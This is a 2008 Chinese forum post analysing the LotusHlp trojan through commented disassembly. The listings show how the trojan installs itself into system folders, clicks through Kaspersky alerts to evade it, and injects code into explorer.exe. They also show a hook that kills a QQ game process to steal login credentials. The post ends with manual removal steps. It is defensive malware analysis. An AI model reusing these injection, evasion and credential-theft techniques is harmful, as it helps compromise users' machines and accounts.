性质:木马类
字长:103,424 字节
00401071 |. 56 push esi ; /EventName => "8397DDFF"
00401072 |. 53 push ebx ; |Inheritable => FALSE
00401073 |. 68 03001F00 push 1F0003 ; |Access = 1F0003
00401078 |. FF15 34204000 call dword ptr ds:[<&KERNEL32.OpenEventA>] ; \OpenEventA
0040107E |. 85C0 test eax,eax
00401080 |. 0F85 7C030000 jnz LotusHlp.00401402
00401086 |. 56 push esi ; /EventName => "8397DDFF"
00401087 |. 53 push ebx ; |InitiallySignaled => FALSE
00401088 |. 53 push ebx ; |ManualReset => FALSE
00401089 |. 53 push ebx ; |pSecurity => NULL
0040108A |. FF15 30204000 call dword ptr ds:[<&KERNEL32.CreateEventA>; \CreateEventA
//打开事件8397DDFF,如果不存在则创建
004010AF |. 56 push esi ; /BufSize => 104 (260.)
004010B0 |. 50 push eax ; |Buffer
004010B1 |. C645 FF 01 mov byte ptr ss:[ebp-1],1 ; |
004010B5 |. FF15 24204000 call dword ptr ds:[<&KERNEL32.GetWindowsDi>; \GetWindowsDirectoryA
004010BB |. 8B3D 20204000 mov edi,dword ptr ds:[<&KERNEL32.GetShortP>; kernel32.GetShortPathNameA
004010C1 |. 8D85 E0FCFFFF lea eax,dword ptr ss:[ebp-320]
004010C7 |. 56 push esi ; /MaxShortPathSize => 104 (260.)
004010C8 |. 50 push eax ; |ShortPath
004010C9 |. 8D85 E4FDFFFF lea eax,dword ptr ss:[ebp-21C] ; |
004010CF |. 50 push eax ; |LongPath
004010D0 |. FFD7 call edi ; \GetShortPathNameA
004010D2 |. 8D85 E4FDFFFF lea eax,dword ptr ss:[ebp-21C]
004010D8 |. 56 push esi ; /BufSize => 104 (260.)
004010D9 |. 50 push eax ; |PathBuffer
004010DA |. 53 push ebx ; |hModule => NULL
004010DB |. FF15 1C204000 call dword ptr ds:[<&KERNEL32.GetModuleFil>; \GetModuleFileNameA
004010E1 |. 8D85 DCFBFFFF lea eax,dword ptr ss:[ebp-424]
004010E7 |. 56 push esi ; /MaxShortPathSize => 104 (260.)
004010E8 |. 50 push eax ; |ShortPath
004010E9 |. 8D85 E4FDFFFF lea eax,dword ptr ss:[ebp-21C] ; |
004010EF |. 50 push eax ; |LongPath
004010F0 |. FFD7 call edi ; \GetShortPathNameA
004010F2 |. 8D85 E4FDFFFF lea eax,dword ptr ss:[ebp-21C]
004010F8 |. 56 push esi ; /BufSize => 104 (260.)
004010F9 |. 50 push eax ; |Buffer
004010FA |. FF15 18204000 call dword ptr ds:[<&KERNEL32.GetSystemDir>; \GetSystemDirectoryA
00401100 |. 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
00401106 |. 56 push esi ; /MaxShortPathSize => 104 (260.)
00401107 |. 50 push eax ; |ShortPath
00401108 |. 8D85 E4FDFFFF lea eax,dword ptr ss:[ebp-21C] ; |
0040110E |. 50 push eax ; |LongPath
0040110F |. FFD7 call edi ; \GetShortPathNameA
00401111 |. 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
00401117 |. 68 4C334000 push LotusHlp.0040334C ; /src = "\"
0040111C |. 50 push eax ; |dest
0040111D |. E8 4E090000 call <jmp.&MSVCRT.strcat> ; \strcat
00401122 |. 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
00401128 |. 68 20334000 push LotusHlp.00403320 ; /src = "LotusHlp.dll"
0040112D |. 50 push eax ; |dest
0040112E |. E8 3D090000 call <jmp.&MSVCRT.strcat> ; \strcat
00401133 |. 8D85 E0FCFFFF lea eax,dword ptr ss:[ebp-320]
00401139 |. 68 4C334000 push LotusHlp.0040334C ; /src = "\"
0040113E |. 50 push eax ; |dest
0040113F |. E8 2C090000 call <jmp.&MSVCRT.strcat> ; \strcat
00401144 |. 8D85 E0FCFFFF lea eax,dword ptr ss:[ebp-320]
0040114A |. 68 10304000 push LotusHlp.00403010 ; /src = "LotusHlp.exe"
0040114F |. 50 push eax ; |dest
00401150 |. E8 1B090000 call <jmp.&MSVCRT.strcat> ; \strcat
00401155 |. 83C4 20 add esp,20
00401158 |. 53 push ebx ; /pThreadId
00401159 |. 53 push ebx ; |CreationFlags
0040115A |. 53 push ebx ; |pThreadParm
0040115B |. 68 8B184000 push LotusHlp.0040188B ; |ThreadFunction = LotusHlp.0040188B
00401160 |. 68 00040000 push 400 ; |StackSize = 400 (1024.)
00401165 |. 53 push ebx ; |pSecurity
00401166 |. FF15 14204000 call dword ptr ds:[<&KERNEL32.CreateThread>; \CreateThread
0040116C |. 6A 02 push 2 ; /Priority = THREAD_PRIORITY_HIGHEST
0040116E |. 50 push eax ; |hThread
0040116F |. 8945 F8 mov dword ptr ss:[ebp-8],eax ; |
00401172 |. FF15 10204000 call dword ptr ds:[<&KERNEL32.SetThreadPri>; \SetThreadPriority
00401178 |. 68 E8030000 push 3E8 ; /Timeout = 1000. ms
0040117D |. FF75 F8 push dword ptr ss:[ebp-8] ; |hObject
00401180 |. FF15 48204000 call dword ptr ds:[<&KERNEL32.WaitForSingl>; \WaitForSingleObject
00401186 |. FF75 F8 push dword ptr ss:[ebp-8] ; /hObject = 00000038
00401189 |. FF15 28204000 call dword ptr ds:[<&KERNEL32.CloseHandle>>; \CloseHandle
004011B3 |. 53 push ebx ; /FailIfExists
004011B4 |. 50 push eax ; |NewFileName
004011B5 |. 8D85 DCFBFFFF lea eax,dword ptr ss:[ebp-424] ; |
004011BB |. 50 push eax ; |ExistingFileName
004011BC |. FF15 78204000 call dword ptr ds:[<&KERNEL32.CopyFileA>] ; \CopyFileA
004011C2 |. 85C0 test eax,eax
004011C4 |. 75 71 jnz short LotusHlp.00401237
004011C6 |. 6A 0A push 0A
004011C8 |. 68 10304000 push LotusHlp.00403010 ; ASCII "LotusHlp.exe"
004011CD |. E8 65060000 call LotusHlp.00401837
004011D2 |. 59 pop ecx
004011D3 |. 8D85 E4FDFFFF lea eax,dword ptr ss:[ebp-21C]
004011D9 |. 59 pop ecx
004011DA |. C705 16304000 2E>mov dword ptr ds:[403016],6578652E
004011E4 |. 56 push esi ; /BufSize
004011E5 |. 50 push eax ; |Buffer
004011E6 |. FF15 24204000 call dword ptr ds:[<&KERNEL32.GetWindowsDi>; \GetWindowsDirectoryA
004011EC |. 8D85 E0FCFFFF lea eax,dword ptr ss:[ebp-320]
004011F2 |. 56 push esi
004011F3 |. 50 push eax
004011F4 |. 8D85 E4FDFFFF lea eax,dword ptr ss:[ebp-21C]
004011FA |. 50 push eax
004011FB |. FFD7 call edi
004011FD |. 8D85 E0FCFFFF lea eax,dword ptr ss:[ebp-320]
00401203 |. 68 4C334000 push LotusHlp.0040334C ; /src = "\"
00401208 |. 50 push eax ; |dest
00401209 |. E8 62080000 call <jmp.&MSVCRT.strcat> ; \strcat
0040120E |. 8D85 E0FCFFFF lea eax,dword ptr ss:[ebp-320]
00401214 |. 68 10304000 push LotusHlp.00403010 ; /src = "LotusHlp.exe"
00401219 |. 50 push eax ; |dest
0040121A |. E8 51080000 call <jmp.&MSVCRT.strcat> ; \strcat
0040121F |. 83C4 10 add esp,10
00401222 |. 8D85 E0FCFFFF lea eax,dword ptr ss:[ebp-320]
00401228 |. 53 push ebx ; /FailIfExists
00401229 |. 50 push eax ; |NewFileName
0040122A |. 8D85 DCFBFFFF lea eax,dword ptr ss:[ebp-424] ; |
00401230 |. 50 push eax ; |ExistingFileName
00401231 |. FF15 78204000 call dword ptr ds:[<&KERNEL32.CopyFileA>] ; \CopyFileA
//判断系统目录下是否存在LotusHlp.dll,LotusHlp.exe两文件,如果不存在则开启一线程将LotusHlp.exe拷贝进入,查找资源释放LotusHlp.dll(代码略)
004019BD . 53 push ebx ; /Title
004019BE . 50 push eax ; |Class = "AVP.AlertDialog" "AVP.Product_Notification"
004019BF . FF15 D0204000 call dword ptr ds:[<&USER32.FindWindowA>] ; \FindWindowA
004019C5 . 3BC3 cmp eax,ebx
004019C7 . 74 48 je short LotusHlp.00401A11
004019C9 . 6A 05 push 5 ; /Relation = GW_CHILD
004019CB . 50 push eax ; |hWnd
004019CC > FF15 D4204000 call dword ptr ds:[<&USER32.GetWindow>] ; \GetWindow
004019D2 . 8BF8 mov edi,eax
004019D4 . 3BFB cmp edi,ebx
004019D6 . 74 39 je short LotusHlp.00401A11
004019D8 . 8D45 A0 lea eax,dword ptr ss:[ebp-60]
004019DB . 6A 1F push 1F ; /Count = 1F (31.)
004019DD . 50 push eax ; |Buffer
004019DE . 57 push edi ; |hWnd
004019DF . FF15 D8204000 call dword ptr ds:[<&USER32.GetWindowTextA>; \GetWindowTextA
//遍历窗口通过模拟点击方式绕过卡巴斯基主动防御
004017CB |. 53 push ebx ; /ProcessID => 0
004017CC |. 6A 02 push 2 ; |Flags = TH32CS_SNAPPROCESS
004017CE |. F3:AB rep stos dword ptr es:[edi] ; |
004017D0 |. E8 95020000 call <jmp.&KERNEL32.CreateToolhelp32Snapsh>; \CreateToolhelp32Snapshot
004017D5 |. 8BF8 mov edi,eax
004017D7 |. 8D85 D8FEFFFF lea eax,dword ptr ss:[ebp-128]
004017DD |. 50 push eax ; /pProcessentry
004017DE |. 57 push edi ; |hSnapshot
004017DF |. C785 D8FEFFFF 28>mov dword ptr ss:[ebp-128],128 ; |
004017E9 |. E8 76020000 call <jmp.&KERNEL32.Process32First> ; \Process32First
004017EE |. 8B35 BC204000 mov esi,dword ptr ds:[<&MSVCRT._stricmp>] ; MSVCRT._stricmp
004017F4 |. 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
004017FA |. 50 push eax
004017FB |. FF75 08 push dword ptr ss:[ebp+8]
004017FE |> FFD6 /call esi
00401800 |. 59 |pop ecx
00401801 |. 85C0 |test eax,eax
00401803 |. 59 |pop ecx
00401804 |. 74 1D |je short LotusHlp.00401823
00401806 |. 8D85 D8FEFFFF |lea eax,dword ptr ss:[ebp-128]
0040180C |. 50 |push eax ; /pProcessentry
0040180D |. 57 |push edi ; |hSnapshot
0040180E |. E8 4B020000 |call <jmp.&KERNEL32.Process32Next> ; \Process32Next
//遍历进程查找 "explorer.exe"
00401486 |. FF75 10 push dword ptr ss:[ebp+10] ; /ProcessId
00401489 |. 6A 00 push 0 ; |Inheritable = FALSE
0040148B |. 68 FF0F1F00 push 1F0FFF ; |Access = PROCESS_ALL_ACCESS
00401490 |. FF15 58204000 call dword ptr ds:[<&KERNEL32.OpenProcess>>; \OpenProcess
00401496 |. 85C0 test eax,eax
00401498 |. 8945 10 mov dword ptr ss:[ebp+10],eax
0040149B |. 75 02 jnz short LotusHlp.0040149F
0040149D |. C9 leave
0040149E |. C3 retn
0040149F |> 53 push ebx
004014A0 |. 56 push esi
004014A1 |. 57 push edi
004014A2 |. FF15 54204000 call dword ptr ds:[<&KERNEL32.GetCurrentPr>; [GetCurrentProcess
//找到后打开进程获取进程伪句柄
………………………………省略一些不必要的
00401767 |. 50 push eax ; /pOldProtect
00401768 |. 6A 40 push 40 ; |NewProtect = PAGE_EXECUTE_READWRITE
0040176A |. FF75 14 push dword ptr ss:[ebp+14] ; |Size
0040176D |. FF75 0C push dword ptr ss:[ebp+C] ; |Address
00401770 |. FF75 08 push dword ptr ss:[ebp+8] ; |hProcess
00401773 |. FFD6 call esi ; \VirtualProtectEx
00401775 |. 85C0 test eax,eax
00401777 |. 74 2C je short LotusHlp.004017A5
00401779 |. 57 push edi
0040177A |. 6A 00 push 0 ; /pBytesWritten = NULL
0040177C |. FF75 14 push dword ptr ss:[ebp+14] ; |BytesToWrite
0040177F |. FF75 10 push dword ptr ss:[ebp+10] ; |Buffer
00401782 |. FF75 0C push dword ptr ss:[ebp+C] ; |Address
00401785 |. FF75 08 push dword ptr ss:[ebp+8] ; |hProcess
00401788 |. FF15 60204000 call dword ptr ds:[<&KERNEL32.WriteProcess>; \WriteProcessMemory
00401643 |. 53 push ebx
00401644 |. 53 push ebx
00401645 |. FF75 F0 push dword ptr ss:[ebp-10]
00401648 |. FF75 E8 push dword ptr ss:[ebp-18]
0040164B |. 68 00040000 push 400
00401650 |. 53 push ebx
00401651 |. FF75 10 push dword ptr ss:[ebp+10]
00401654 |. FF15 38204000 call dword ptr ds:[<&KERNEL32.CreateRemote>; kernel32.CreateRemoteThread
//申请内存写入木马代码创建远程线程激活
//被微点主防kill了
text:10001C2B push esi
.text:10001C2C xor esi, esi
.text:10001C2E push esi
.text:10001C2F push hModule
.text:10001C35 push offset sub_10001C10
.text:10001C3A push 3
.text:10001C3C call ds:SetWindowsHookExA
.text:10001C42 push offset aQqffo_exe ; "qqffo.exe"
.text:10001C47 mov ds:hhk, eax
.text:10001C4C call sub_100058B6
.text:10001C51 cmp eax, esi
.text:10001C53 pop ecx
.text:10001C54 jz short loc_10001C6C
.text:10001C56 push eax
.text:10001C57 push esi
.text:10001C58 push 1
.text:10001C5A call ds:OpenProcess
.text:10001C60 cmp eax, esi
.text:10001C62 jz short loc_10001C6C
.text:10001C64 push esi
.text:10001C65 push eax
.text:10001C66 call ds:TerminateProcess
//dll如果被激活后下钩子钩住GetMessage遍历进程查找qqffo.exe(QQ自有幻想),打开将其结束,当用户再次登陆时盗取账号密码信息
此类行为木马手杀方案:
下载wsyscheck或者SnipeSword、IceSword等等性质工具选择“禁止线程创建”后打开explorer.exe进程直接卸载病毒dll就可以,删除病毒启动项以及主体文件
[
本帖最后由 南亚颗粒 于 2008-2-16 17:58 编辑 ]
